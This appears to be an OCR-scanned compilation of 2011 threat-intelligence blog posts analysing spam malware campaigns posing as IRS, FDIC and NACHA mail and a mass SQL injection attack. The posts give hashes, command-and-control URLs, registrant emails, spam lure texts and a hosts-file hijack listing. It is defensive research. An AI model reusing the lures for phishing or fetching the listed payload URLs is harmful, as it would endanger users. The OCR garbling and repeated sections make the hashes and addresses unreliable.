rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el 9eff0df0cf2fba9247; 

82b6fl 8bl30alf0cel ce928d0980fab0 

What's particularly interesting is the fact that both 
campaigns have been launched by the same cybercriminal, 

with the same C &C - rattsillis.com also seen in the 

[6]spamvertised ACH Payment Canceled campaign. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 

1. htto.V/www.zdnet.com/bloa/securit v/s oamvertised- 
uniform-traffic-tickets-and-invoices-lead-to-malwa re/9289 

2. http://www.zdnet.com/bloa/securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-malwa re/932 

8 

3. 

http://www. virustotai. com/file-scan/report, him I? 
id=ca67al4bfed2a7bc2ac8be9c01cbl7d5dal2b75320b4ba 

d4fe8d8a 

6759ad9725-1315139717 

4. 

http://www. virustotai. com/fiie-scan/report. him I? 

id=5 Obi 04c 5 f831432 7e03b01 e 7f7c2535d8de 7cd9f73f8el 6 

d!364c7 


fd021a90cc-1315139775 




















5. 


http://www. virustotal. com/file-scan/report.html? 

id=l 741ef5d24641ee99b5d78a68109162bebc714c3dl 9ahe 

37e36447 

2f3dcd6fl8-1315161281 

6. http://labs.m86securitv. com/2011/09/a n-analvsis-of-the- 
ach-spam-campai an/ 

7. http://ddanchev.blo as pot.com/ 

8. http://twitter.com/danchodanchev 
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Spamvertised 'Uniform Traffic Ticket' and 'FDIC 
Notifications' Serving Malware - Historical OS I NT 

(2011-09-28 14:43) 

The following intelligence brief will summarize the findings 
from a brief analysis performed on two malware 

campaigns from August, namely, the [1 /spamvertised 
Uniform Traffic Tickets and the [2JFDIC Notification. 

Uniform Traffic Tickets 

Spamvertised attachments - Ticket-728-2011.zip; Ticket- 
064-211.zip; Ticket- 728-201 l.zip 


Detection rates: 















Ticket.exe - [3]Gen:Trojan.Heur.FU.bqW@aK9ebrii - 

Detection rate: 37/43 (86.0 %) 

MD5 : 6361 c/4a40485345cl 84 73f3c6b4b6609 

SHA1 : 50b09bb2e0044aal39a84c2e445a56f01 d70cl 85 

SHA256: 

ca67al4bfec/2a 7bc2ac8be9c01 cbl 7d5dal2b75320b4bad4f 
e8d8a6759ad9725 

Ticketl.exe - [4]Trojan-Downloader. Win32.Small.ccxz - 

Detection rate: 36/44 (81.8 %) 

MD5 : e2a2d67b8a52ae655f92779bec296676 

SHA1 : ed3df72b4e073ffba 7174ebc8cb 77b2b 7d012cbf 

5HA256: 

50 bl 04c5f8314327e03b01 e 7f7c2535d8de 7cd9f73f8el 6dl 3 
64c7fd021a90cc 

Upon execution the samples phone back to: 

sdkjgndfjnf.ru/pusk3.exe - 91.220.0.55 (responding to 
the same IP is also survey-providers.info) - A551630 - Email: 
835 

admin@sdkjgndfjnf.ru 

rattsillis.com/ftp/g.php -195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 

rattsillis.com/pusk3.exe -195.189.226.109; 
178.208.77.247; 195.189.226.107; 195.189.226.108 - 
AS41018 - Email: admin@jokelimo.com 



DNS emulation of nsl.lemanbrostm.info reveals two 
domains belidiskalom.com - 178.208.76.175 - Email: 
admin@beiidiskaiom.com and iemanbrostm.info - Email: 
coz@yahoo.com using the same name server. 

Known MD5 modifications for pusk3.exe at 
rattsillis. com: 

C6dab856705b5dfd09b2adbel0701b05 

fl67213c6a79f2313995e80a8ac29939 

f4 764cce5c3795bl d63a299a5329d2e2 

dae9e76535734 78a 6b41 a 62f7cb99cl 2 

69c983c9dfaf37e346004c9aaf54a3d0 

d875b8e32a231405c7fa96b810e9b361 

628270c6e44b Ofa21 ef8e8 7c6bc36f5 7 

9b69dabd876e967bcd2eb85465175e3b 

0434c084dba8626df980c7974d5728el 

Related binaries and associated MD5 modifications: 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el 9eff0df0cf2fba9247; 
82b6fl8bl30alf0celce928d0980fab0 

rattsiilis.com/pusk.exe - MD5: 

55d8e25bc373a98c5c29284c989953ab; 

368c86556e827d898f043a4d5f378fa0; 



7411 d0d29db91 f2625ee36d438eb6ac4; 
3ea4e9fd297b3058ebbb360cl581aaac; 

rattsillis.com/pusk2.exe - MD5: 
dae9e76535734 78a 6b41 a 62f7cb99cl 2; 
b 73705c097c9be9779 730d801 a d098e 0; 

d7952cl e 7 7d7bb250cdfa88el57fb5a8 

Known MD5 modifications for pusk3.exe at 
sdkjgndfjnf.ru: 8672f021e7705b6a8132b7dfc21617cf 

sdkjgndfjnf.ru/blood.exe - MD5: 

577cf0b 7ca3d5bcbe35764024f241 fa8; 
ebf7278a7239378e7d70d426779962ce 

sdkjgndfjnf.ru/pusk2.exe - MD5: 
d9e36e25a3181 f574fd5d520cb501 d3a 

sdkjgndfjnf.ru/pusk.exe - MD5: 
fce04f7681283207d585561 ed91 e 77b4 

sdkjgndfjnf.ru/blood.exe - MD5: 

577cf0b 7ca3d5bcbe35764024f241fa8 

Detection rate for blood.exe: 

blood.exe - [5jTrojan-Spy.Win32.Zbot - 25/44 (56.8 %) 

MD5 : 577cf0b7ca3d5bcbe35764024f241fa8 

SHA1 : 30f542a44d06d9125cdfbdd38d79de778e4c0791 

5HA256: 

1741ef5d24641ee99b5d78a68109162bebc714c3dl 9abc37 
e3d44 72f3dcd6fl 8 
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FDIC Notification 


Spamvertised attachments: FDIC_Document.zip 
Detection rate: 

FDIC _Document.exe - 

Gen:Trojan.Fleur.FU.bq W@a45Fkibi - 35/44 (79.5 %) 

MD5 : 7b5a271 c58c6bbl8d79cd48353127ff6 5HA1 : 
6526b6097df42f93bee25d7ea 73f95d2fcc24d3a 5HA256: 

a09165c71a8dd2al338b2bd0c92ae07495041ael5592e343 

2bd50600e6ef2af0 

Upon execution phones back to: 

rattsillis. com/ftp/g.php 

rattsillis. com/blood, exe 

rattsillis.com/blood.exe - MD5: 

23795cb9b2f5el 9eff0df0cf2fba9247; 

82b6fl 8bl30alf0cel ce928d0980fab0 

What's particularly interesting is the fact that both 
campaigns have been launched by the same cybercriminal, 

with the same C &C - rattsillis.com also seen in the 

[6]spamvertised ACH Payment Canceled campaign. 

This post has been reproduced from [7]Dancho 
Danchev's blog. Follow him [8]on Twitter. 


1. htto.V/www.zdnet.com/bloa/securit v/s oamvertised- 
uniforim-traffic-ticl<ets-and-invoices-lead-to-malware/9289 

2. htto.V/www.zdnet.com/bloa/securitv/malware-watch-fdic- 
and-western-union-themed-emails-lead-to-malware/932 

8 

3. 

htto.V/www. virustotal. com/file-scan/reoort.html? 
id=ca67al4bfed2a7bc2ac8be9c01cbl7d5dal2b75320b4ba 

d4fe8d8a 

6759ad9725-1315139717 

4. 

htto.V/www. virustotal. com/file-scan/reoort.html? 

id=5 Obi 04c 5 f831432 7e03b01 e 7f7c2535d8de 7cd9f73f8el 6 

d!364c7 

fd021a90cc-1315139775 

5. 

htto.V/www. virustotal. com/file-scan/reoort.html? 

id=l 741ef5d24641ee99b5d78a68109162bebc714c3dl 9abe 

37e3d447 

2f3dcd6fl 8-1315161281 

6. http://labs.m86securitv. com/2011/09/an-analvsis-of-the- 
ach-soam-camoai an/ 

7. htto.V/ddanchev.blo as oot. com/ 

8. http://twitter.com/danchodanchev 
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Summarizing ZD Net's Zero Day Posts for September 
(2011-10-04 14:37) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for September You can subscribe to my 

[ljpersonal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

01. [3]Spamvertised 'Facebook notification' leads to 
exploits and malware 

02. [4]Google, Mozil/a and Microsoft ban the DigiNotar 
Certificate Authority in their browsers 

03. [5]Microsoft themed ransomware variant spotted in the 
wild 

04. [6]'Man in wheelchair falls down the elevator shaft' 
scam spreading on Facebook 

05. [7]New ransomware variant uses false child porn 
accusations 

06. [8]Russian Embassy in London hit by a DDoS attack 
07. [9]uTorrent.com hacked, serving sea re ware 


08. [lOjBank of Melbourne Twitter account hacked, 
spreading phishing links 

09. [11 ]Malicious spam campaigns proliferating 

10. [12]5pamvertised 'We are going to sue you' emails lead 
to malware 
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11. [13JXS5 bug in Skype for iPhone, iPad allows address 
book theft 

12. [14]Researcher releases details on 6 5CADA 
vulnerabilities 

13. [15JDIY botnet kit spotted in the wild 

14. [16]New Mac 05 X trojan poses as malicious PDF file 

15. [17]5urvey: 60 percent of users use the same password 
across more than one of their online accounts 

This post has been reproduced from [18]Dancho 
Danchev's blog. Follow him [19]on Twitter. 

1. http://www.zdnet.com/toDics/dancho+danchev? 
o=l&mode=rss&ta g =mantle skin:content 

2. htto://feeds.feedburner. com/zdnet/securit v 

3. htto://www.zdnet.com/bioa/securit v/s oamvertised- 
facebook-notification-leads-to-exoloits-and-malware/9334 

4. httD://www.zdnet.com/bloa/securit v/ aooale-moziila-and- 
microsoft-ban-the-diainotar-certificate-authorit v-i 


n - th eir-bro wsers/9337 



















5. httoV/www.zdnet.com/blog/securitv/microsoft-themed- 
ransomware-vanant-SDOtted-in-the-wild/9341 

6. htto.V/www.zdnet. com/bloa/securitv/man-in-wheelchair- 
fa Us-do wn-the-ele va tor-shaft-scam-soreadin a-on - fa ce 

book/9403 

7. htto.V/www.zdnet. com/bloa/securitv/new-ransomware- 
va riant - uses-false-ch ild-oorn-a ccusa tions-/9406 

8. httoV/www.zdnet.com/blog/securitv/russian-embassv-in- 
london-hit-b v-a-ddos-a ttack/9409 

9. httoV/www.zdnet.com/blog/securitv/utorrentcom-hacked- 
servina-sca reware/9413 

10. http://www.zdnet, com/bloo/security/bank-of-melbourne- 
t witter-a ccoun t-ha cked-soreadin g- ohishin g-links/9415 

11. httD.V/www.zdnet.com/blog/securitv/malicious-SDam- 
camoaigns-oroiiferating/9420 

12. http://www.zdnet, com/blog/securit v/s oam vertised-we- 
are-going-to-sue-vou-emails-lead-to-malware/9423 

13. htto://www.zdnet. com/blog/securitv/xss-bug-in-sk voe- 
for-iDhone-ioad-aUows-address-book-theft/9426 

14. htto://www.zdnet.com/blog/securitv/researcher-releases- 
details-on-6-scada-vulnerabilities/9432 

15. htto.V/www.zdnet. com/blog/securitv/div-botnet-kit- 
s ootted-in-the-wild/9440 

16. htto.V/www.zdnet. com/blog/securitv/new-mac-os-x- 
tro ian-ooses-as-malidous-Ddf-file/9486 









































































17. htto://www.zdnet. com/bloa/securitv/survev-6O-oercent- 
of-users-use-the-same-oassword-across-more-than-one- 

of-their-online-accounts/9489 

18. htto.V/ddanche v. b lo g s oot, com/ 

19. htto://twitter, com/danchodanchev 
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Spamvertised "NACHA security nitification" Serving 
Malware - Historical OSINT (2011-10-04 14:38) 

The following intelligence brief will offer historical OSINT on 
the "NACHA security nitification" - the typo is intentionally 
left as this is how the original campaign was spamvertised - 
malware campaign. 

Spamvertised body: 

Dear Valued Client, We strongly believe that your account 
may have been compromised. Due to this, we cancelled the 
last ACH transactions:-(ID: 13104924)-(ID: 04804768)-(ID: 
37527025)-(iD: 51633547)initiated from your bank account 
by you or any other person, who might have access to your 
account.Detailed report on initiated transactions and 
reasons for cancellation can be found in the attachment. 


The ACH transaction (ID: 83612541), recently sent from 
your bank account (by you or any other person), was 
rejected by the Electronic Payments Association. 














########################## 

##################### 

Canceled transaction 

Transaction ID: 83612541 

Reason of rejection See details in the report below 

Transaction Report report _1409.pdf. zip (ZIP archive, Adobe 
PDF) 

########################## 

##################### 

13450 Sunrise Valley Drive, Suite 100 Herndon, VA 20171 
(703) 561-1100 

2011 NACHA - The Electronic Payments Association 

Spamvertised attachments: report_1409.pdfzip; Report- 
87 64. zip 

Detection rate: 

Report-8764.exe - [l]Gen:Trojan.Heur.FU.bqW@amtJU@oi - 
39/43 (90.7 %) 

MD5 : 7cl31fa05e01fc32d8f4efe53aa883dl 

SHA1 :14d52d76dd7ccc595554486027634bf8c9877036 

SHA256: 

ladllcll 93f0dbcae3766e5cb4094accl37cl 0430d615e554 
70cbc41ce6cd03a 


Upon execution the sample phones back to: 



onemoretimehi.ru/piety.exe -188.65.208.59; 
178.208.91.192 - Email: admin@onemoretimehi.ru 

onemoretimehi. ru/ftp/g.php 

piety.exe - MD5: 4bd87ecc4423f0bcl5e229ecbf33aa2c 

onemoretimehi.ru/tops.exe - MD5: 
fO 76dbc365ec 7bfc438a d3c728702122; 

86c7489a c539a Ob 5 7a4d075e723075fO 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 
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1 . 

htto://www. virustotal. com/file-scan/report.html? 
id=ladl Icll 93f0dbcae3 766e5cb4094accl 3 7 cl 0430d615e 

5547Ocbc 

41ce6cd03a-1317676852 

2. htto://ddanchev.blo as oot. com/ 

3. http://twitter.com/danchodanchev 
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Spamvertised "IRS notice" Serving Malware (2011- 
10-09 19:53) 

Cybercriminals are spamvertising yet another malware¬ 
serving campaign. Impersonating the IRS, malicious 










attackers are attempting to entice end users into 
downloading and executing a malicious file attachment. 

Spamvertised message: Tax notice, There are arrears 
reckoned on your account over a period of 2010-2011 

year You will find all calculations according to your financial 
debt, enclosed. Sincerely, Internal Revenue Service 
Detection rate: 

Calculations.exe - [IJTrojan Down loader: Win32/Dofoil.D - 

33/43 (76.7 %) 

MD5 :178bb562d9c0ef2b0a87467dcbd945ee 

SHA1 : 9ef75146aeb27102aIe5662284f369a43144225c 

SHA256: 

dl551934d60033c8 71 b377015c8be65d608b33543fl 49369 
dle70361e06dc05e 

Upon execution, it phones back to 

falcononfly2006. ru/blog/task.php ? 
bid=2bfc680038ba2be7 &os=5-l-2600 

&uptime=0 &rnd=150156 

falcononfly2006.ru - 91.229.90.139, AS6753 - Email: 
makrogerhouse@yandex. ru 

makrogerhouse@yandex.ru is also associated with the 
following domains: 

diamondexchange2011. ru 

philippinemoney2011. ru 


Bedo wnloader2011. ru 



dolcekomarenoro2011. ru 


forsalga 102.ru 

runescapegpge2011. ru 

yom warayom2001. ru 

philippinemoney2011. ru 

moneymgmt2011. ru 

moneykeep2011. ru 

fire wallmakeo ver. ru 

czechmoney2011. ru 

communityspace2911. ru 

brazilianmoney2011. ru 

Monitoring of the campaign is ongoing . 

This post has been reproduced from [2]Dancho 
Danchev's blog. Follow him [3Jon Twitter. 

1 . 

htto://www. virustotai. com/fiie-scan/reoort.htmi? 
id=dl551934d60033c871b377015c8be65d608b33543fl49 

369dle703 
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61 e06dc05e-1318162358 
2. htto://ddanchev.bio as oot. com/ 










3. http://twitter.com/danchodanchev 
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Spamvertised IRS-themed "Last Notice" Emails 
Serving Malware (2011-10-18 21:45) 

Cybercriminals are once again impersonating the Internal 
Revenue Service (IRS) for malware-serving purposes. In 

this intelligence brief, we'll dissect the malware campaign. 

Spamvertised attachment: IRS Calculations_ 
#ID6749.zip 

Spamvertised message: Notice, There are arrears 
reckoned on your account over a period of 2010-2011 year. 
You will find all calculations according to your financial debt, 
enclosed. You have to pay out the debt by the 17 December 
2011. Yours sincerely, IRS. 

- Detection rate: 

IRS _ Calculations, exe - [1 ]W32/Yakes.B!tr - 34/40 (85.0 %) 

MD5 : e44eb03582f030d30251e6be384f6b32 

SHA1 :eaa3d76534d247d04987b8950965d0142d770b29 

SHA256: 

18386f49580298eee 73688ce5e626a9e332886c25403a991 
495e0a3250c53e32 

Upon execution phones back to: 



bitgale. com/404.php?type=stats &affid=574 
&subid=01 &iruns - 31.44.184.42; A515884 - Email: 

davidsid- 

dins@gxmailbox. com 

shbsharri.com/arkivi_files7574-01.exe - returns 
"Bandwidth Limit Exceeded" - 74.55.50.202; A521844 - 
Email: contact@privacyprotect. org 

shbsharri.com/arkivi files/setup.exe - returns 
"Bandwidth Limit Exceeded" 

shbsharri. com/arki vi _ file s/s II6. exe - returns 
"Bandwidth Limit Exceeded" 

shbsharri. com/arki vi _ files/sssss. exe - re turns 
"Bandwidth Limit Exceeded" 

gansgansgroup. ru/true/index.php ?cmd=getgrab - 

Connect to 91.229.90.139 on port 80 ... failed 

gansgansgroup. ru/true/index.php ?cmd=getproxy - 

Connect to 91.229.90.139 on port 80 ... failed 

gansgansgroup. ru/true/index.php ?cmd=getload 
& log in=4117AF14E694E469C &sel=donat &ver=5.1 
&bits=0 

&file=l &run=ok 

gansgansgroup. ru/true/index.php ?cmd=getsocks 
& log in=4117AF14E694E469C &port= 11925 

gansgansgroup.ru - 91.229.90.139; A56753 (responding 
to 91.229.90.139 is also falcononfly2006.ru - Email: 



makrogerhouse@yandex.ru) - Email: 
gansgansgroup. ru@aiiperson. ru 

The same email makrogerhouse@yandex.ru, has been 
linked to a [2]previously spamvertised IRS-themed 

malware campaign. 

Clearly, both campaigns have been launched by the same 
cybercriminal. 

This post has been reproduced from [3]Dancho 
Danchev's blog. Follow him [4]on Twitter. 
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1 . 

htto://www. virustotal. com/file-scan/report.html? 
id=18386f49580298eee73688ce5e626a9e332886c25403a9 

91495e0a 

3250c53e32-1318962605 

2. htto://ddanchev.blo as oot. com/2011/10/soamvertssed :rs- 
notice-servina-malware.html 

3. htto.V/ddanchev.blo as oot.com/ 

4. http://twitter.com/danchodanchev 
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Dissecting the Ongoing Mass SQL Injection Attack 
(2011-10-20 23:36) 















The [ljongoing mass SQL injection attack, has already 
affected over a [2]million web sites. Cybercriminals 
performing [3]active search engines [4]reconnaissance 

have managed to inject a malicious script into ASP ASP.NET 
websites. 

From [5]ciient-side exploits to bogus Adobe Flash players, 
the campaign is active and ongoing. In this intelligence 
brief, we'll dissect the campaign and establish a direct 
connection between the campaign and last March's 

[6]Lizamoon mass SQL injection attack. 

SQL injected domains - thanks to Dasient's Tufan Demir 
for the ping: 

nbnjki.com/urchin.js -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

jjghui.com/urchin.js -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

bookzula.com/ur.php -146.185.248.3 - Email: 
jamesnorthone@hotmai!box. com 

bookgusa.com/ur.php -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

dfrgcc.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

statsl.com/ur.php -111.22.111.111 - Email: 
jamesnorthone@hotmailbox. com 

miiapop.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 



jhgukn.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 
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vovmml.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

bookvivi.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

Responding to 146.185.248.3 is also file-dl.com; 

bookfuia.com and bookvila.com - Email: 

james- 

northone@hotmailbox. com 
Detection rate for urchin.js: 

urchin.js - [7]Trojan.JS.Redirector -17/42 (40.5 %) 

MD5 : 4387f9be5af4087d21c4b44b969a870f 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 

5HA256: 

975e62fel d9415b9fa06e8f826f776ef851 bd030c2c897bc3fb 
ee207519f8351 

The redirections take place as follows: 

• bookzula.com/ur.php 

-> 

www3. topasarmy. in/?w4q593n= 



Email: 


bill.swinson@yahoo. com 
-> 

firstrtscaner. rr. n u 

• nbnjkl.com/urchin.js -> power-wfchecker.in/? 
Idiia916= - Email: bill.swinson@yahoo.com 

bill.swinson@yahoo.com has also been used to register the 
following scareware-serving domains: 

uberble-safe. in 

uberate-safe. in 

best-jsentinei. in 

to pan ti vir-foru. in 

personalscannerlg. in 

rideusfor.in 

hardbsy-network. in 

enabiesecureum. in 

hardynauchecker. in 

best-jsentinei. in 

smartklhdefense. in 

smartaasecurity. in 



personal-scan-4u.in 
unieve-safe. in 
safe-solutionsoft. in 
hugebie-cure.in 
topsecuritykauu. in 
personaicieansoft. in 
po werscanercis. in 
topksfsecurity, in 
hard-anti virbjb. in 
strong-guardbxz. in 
smart-suiteguard. in 
thebestkrearmy. in 
smart-guardianro. in 
freeopenscanerpo. in 
best-networkqjo. in 
hard-anti virbjb. in 
smartantivir-scanner. in 
848 
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most-popuiarsoftcontent. in 


bester-msecuriity. in 
doneahme.in 
strong-checkerwrt. in 
safepo werforu. in 
safe-securityarmy. in 
personai-bpsentinei. in 
personalcleansoft. in 
ostestsystemri. in 
sa vein ternet-guard. in 
just-perfectprotection. in 
firstholderm vq. in 
just-perfectprotection. in 
allcle-safe.in 
bra waidme.in 
uniind-safe. in 
moreaz-fine.in 
trueeox-safe.in 
safexanet.in 

personai-internet-foryou.in 



For the time being, the campaing is redirecting to a fake 
YouTube page enticing users into downloading a bogus 

Adobe Flash player in order to view the video. 

Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8] Backdoor: Win32/Simda.A - 8/43 (18.6 
%) 

MD5 : fb4c93935346d2d8605598535528506e 

SHA1 : 0ff7ccd785c0582e33c22f9b21156929ba 7abaeb 

SHA256: 

b204586cbacl 606637361 dd788b691 f342cbl c582dl 06902 
09a989b040dab632 

Upon execution the sample phones back to: 
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209.212.147.141/chrome/report, html 

98.142.243.64/chrome/report, h tml 

update.19runsl0q3.com - 65.98.83.115 

The same phone back locations have been used in a variety 
of related malware - thanks to Kaspersky's David 

Jacoby for the ping. For instance, in [9]this malware 
sample that's also phoning back to the same URLs, we 
have active FiOSTS file modification as follows: 

See related post: [10] Sampling Malicious Activity 
Inside Cybercrime-Friendly Search Engines 



www. google, com. =87.125.87.99; 
google, com. =87.125.87.103; 
google, com. a u. =87.125.87.104; 
www. google, com.au. =87.125.87.14 7; 
google, be.=77.125.87.148; 
www. google, be. = 77.125.87.149; 
google, com. br.=77.125.87.109; 
www. google, com. br. = 77.125.87.150; 
google, c a.=77.125.87.152; 
www. google, c a. = 77.125.87.153; 
google. ch.=77.125.87.155; 
www. google. ch. = 77.125.87.158; 
google, de.=77.125.87.160; 
www. google, de. = 77.125.87.161; 
google, dk. =92.125.87.123; 
www.google.dk. =92.125.87.160; 
google, fr. =92.125.87.154; 
www.google.fr. =92.125.87.134; 
google, ie. =92.125.87.170; 
www. google, ie. =92.125.87.177; 



google.it. =92.125.87.173; 

www. google, it. =92.125.87.14 7; 

google, co.jp. =92.125.87.103; 

www. google, co.jp. =84.125.87.14 7; 

google.nl. =84.125.87.103; 

www. google, nl. =84.125.87.14 7; 

google, no. =84.125.87.103; 

www.google.no. =84.125.87.14 7; 

google, co. nz. =84.125.87.103; 

www. google, co. nz. =84.125.87.14 7; 

google.pl. =84.125.87.103; 

www.google.pl.=64.125.87.14 7; 

google, se. =64.125.87.103; 

www.google.se.=64.125.87.14 7; 

google, co. uk. =64.125.87.103; 

www. google, co. uk. =64.125.87.147; 

google, co.za. =64.125.87.103; 

www. google, co.za. =64.125.87.14 7; 

www. google-analytics. com. =64.125.87.101; 

www.bing. com. =92.123.68.97; 
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search.yahoo, com. = 72.30.186.249; 

www.search.yahoo, com. = 72.30.186.249; 

uk.search.yahoo, com. =87.248.112.8; 

ca. search.yahoo, com. =100.6.239.84; 

de.search.yahoo.com. =87.248.112.8; 

frsearch.yahoo.com. =87.248.112.8; 

a u. search.yahoo, com.=87.248.112.8; 

ad-emea. doubleclick.net.=64.125.87.101; 

www.statcounter.com. =64.125.87.101; 

[11] The Liza moon mass SQL injection connection 

The same email used to register the SQL injected domains 
jamesnorthone@hotmailbox.com has been used to 

register the Liza moon mass SQL injection attack domains 
extensively profiled here - '[12]Dissecting the Massive 
SQL 

Injection Attack Serving Scareware". 

Related posts: 

• [13JSQL Injection Through Search Engines Reconnaissance 

• [14]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 



• [15]Massive SQL Injection Attacks - the Chinese Way 

• [16]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [17]GoDaddy's Mass Word Press Blogs Compromise 
Serving Sea re ware 

• [18]Dissecting the Word Press Blogs Compromise at 
Network Solutions 

• [19]Yet Another Massive SQL Injection Spotted in the Wild 

• [20]Smells Like a Copycat SQL Injection In the Wild 

• [21 jFast-Fluxing SQL Injection Attacks 

• [22]0bfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [23]Dancho 
Danchev's blog. Follow him [24]on Twitter. 

1. httD://www.zdnet.com/bloa/securitv/over-a-million-web- 
sites-affected-in-mass-sal-iniection-attack/9662 

2. htto.Y/i.zdnet.com/bloas/mass_sal_in lection attack. ona 

3. htto://ddanchev.blo as oot. com/2007/07/sal-iniection- 
throuah-search-enaines.html 

4. htto://ddanchev.blo as oot. com/2009/04/massive-sa l- 
in iections-throuah-search.html 

5. http://bloa.armorize.com/2011/10/htt oU ahuicomurchin is- 
mass- nfection, himl 

6. htto://ddanchev.blo as oot. com/2011/03/dissectin a- 
massive-sal-iniection-attack.html 




























7. 


htto://www. virustotal. com/file-scan/report.html? 
id=975e62fel d9415b9fa06e8f826f776ef851 bd030c2c897b 

c3fbee2 

07519f8351-1318924415 

8 . 

http://www. virustotal. com/file-scan/report.html? 
id=b204586cbacl 606637361 dd788b&91 f342cbl c582dl 069 

0209a989 

b040dab632-1319047251 


9. htto://oastebin.com/EEHVb6ux 

10. htto://ddanchev. blo as oot. com/2010/07/samolim a¬ 
nia lidous-activitv-inside. html 
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12. htto.V/ddanchev. blo as oot. com/2011/03/dissectin a- 
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13. htto.V/ddanchev. blo as oot. com/2007/07/sal-iniection- 
throuah-search-enaines.html 

14. htto.V/ddanchev. blo as oot. com/2009/04/massive-sa l- 
in iections-throuah-search.htm! 

15. htto.V/ddanchev. blo as oot. com/2008/10/massive-sa l- 
in iection-a tta cks-chinese. h tml 







































16. http.V/ddanchev. blo as oot. com/2010/07/cvbercriminals- 
s al-iniect-cvbercrime.html 

17. http.V/ddanchev. blo as oot. com/2010/04/aodaddvs-mass- 
wordoress-bloas. html 

18. htto.V/ddanchev. blo as oot. com/2010/04/dissectin a- 
wordoress-bloas-comoromise.html 

19. http.V/ddanchev. blo as oot. com/2008/05/vet-another- 
massive-sal-iniection.html 

20. http.V/ddanche i/. blo as oot. com/2008/07/smells-like- 
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Dissecting the Ongoing Mass SQL injection Attack 
(2011-10-20 23:36) 

The [ljongoing mass SQL injection attack, has already 
affected over a [2 /million web sites. Cybercriminals 
performing [3 /active search engines [4/reconnaissance 








































have managed to inject a malicious script into ASP ASP.NET 
websites. 

From [5]dient-side exploits to bogus Adobe Flash players, 
the campaign is active and ongoing. In this intelligence 
brief, we'll dissect the campaign and establish a direct 
connection between the campaign and last March's 

[6]Lizamoon mass SQL injection attack. 

SQL injected domains - thanks to Dasient's Tufan Demir 
for the ping: 

nbnjki.com/urchin.js -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

jjghui.com/urchin.js -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

bookzula.com/ur.php -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

bookgusa.com/ur.php -146.185.248.3 - Email: 
jamesnorthone@hotmailbox. com 

dfrgcc.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

statsl.com/ur.php -111.22.111.111 - Email: 
jamesnorthone@hotmailbox. com 

milapop.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

jhgukn.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 
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vovmml.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

bookvivi.com/ur.php - Email: 
jamesnorthone@hotmailbox. com 

Responding to 146.185.248.3 is also file-dl.com; 

bookfula.com and bookvila.com - Email: 

james- 

northone@hotmailbox. com 
Detection rate for urchin.js: 

urchin.js - [7]Trojan.JS.Redirector - 17/42 (40.5 %) 

MD5 : 4387f9be5af4087d21c4b44b969a870f 

SHA1 : 8a47842ccf6d642043ee8db99d0530336eef6b99 

5HA256: 

975e62fel d9415b9fa06e8f826f776ef851 bd030c2c897bc3fb 
ee207519f8351 

The redirections take place as follows: 

• bookzula.com/ur.php 

-> 

www3. topasarmy. in/?w4q593n= 


Email: 



bill.swinson@yahoo. com 
-> 

firstrtscaner. rr. n u 

• nbnjkl.com/urchin.js -> power-wfchecker.in/? 
Idiia916= - Email: bill.swinson@yahoo.com 

bill.swinson@yahoo.com has also been used to register the 
following scareware-serving domains: 

uberbie-safe. in 

uberate-safe. in 

best-jsentinei. in 

to pan ti vir-foru. in 

personalscannerlg. in 

rideusfor.in 

hardbsy-network. in 

enabiesecureum. in 

hardynauchecker. in 

best-jsentinei. in 

smartkihdefense. in 

smartaasecurity. in 

personal-scan-4 u. in 


unieve-safe.in 



safe-solutionsoft. in 


hugeble-cure.in 
topsecuritykauu. in 
personaicieansoft. in 
po werscanercis. in 
topksfsecurity, in 
hard-anti virbjb. in 
strong-guardbxz. in 
smart-suiteguard. in 
thebestkrearmy. in 
smart-guardianro. in 
freeopenscanerpo. in 
best-networkqjo. in 
hard-anti virbjb. in 
smartantivir-scanner. in 
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most-popuiarsoftcontent. 
bester-msecuriity. in 


doneahme.in 


strong-checkerwrt. in 
safepo werforu. in 
safe-securityarmy. in 
personai-bpsentinei. in 
personalcleansoft. in 
ostestsystemri. in 
sa vein ternet-guard. in 
just-perfectprotection. in 
firstholderm vq. in 
just-perfectprotection. in 
allcle-safe.in 
bra waidme. in 
uniind-safe. in 
moreaz-fine. in 
trueeox-safe.in 
safexanet.in 

personai-internet-foryou.in 

For the time being, the campaing is redirecting to a fake 
YouTube page enticing users into downloading a bogus 

Adobe Flash player in order to view the video. 



Detection rate for the bogus Adobe Flash player: 

scandisk.exe - [8] Backdoor: Win32/Simda.A - 8/43 (18.6 
%) 

MD5 : fb4c93935346d2d8605598535528506e 

SHA1 : 0ff7ccd785c0582e33c22f9b21156929ba 7abaeb 

SHA256: 

b204586cbacl 606637361 dd788b691 f342cbl c582dl 06902 
09a989b040dab632 

Upon execution the sample phones back to: 

855 

209.212.147.141/chrome/report, html 

98.142.243.64/chrome/report, h tml 

update.19runsl0q3.com - 65.98.83.115 

The same phone back locations have been used in a variety 
of related malware - thanks to Kaspersky's David 

Jacoby for the ping. For instance, in [9]this malware 
sample that's also phoning back to the same URLs, we 
have active FiOSTS file modification as follows: 

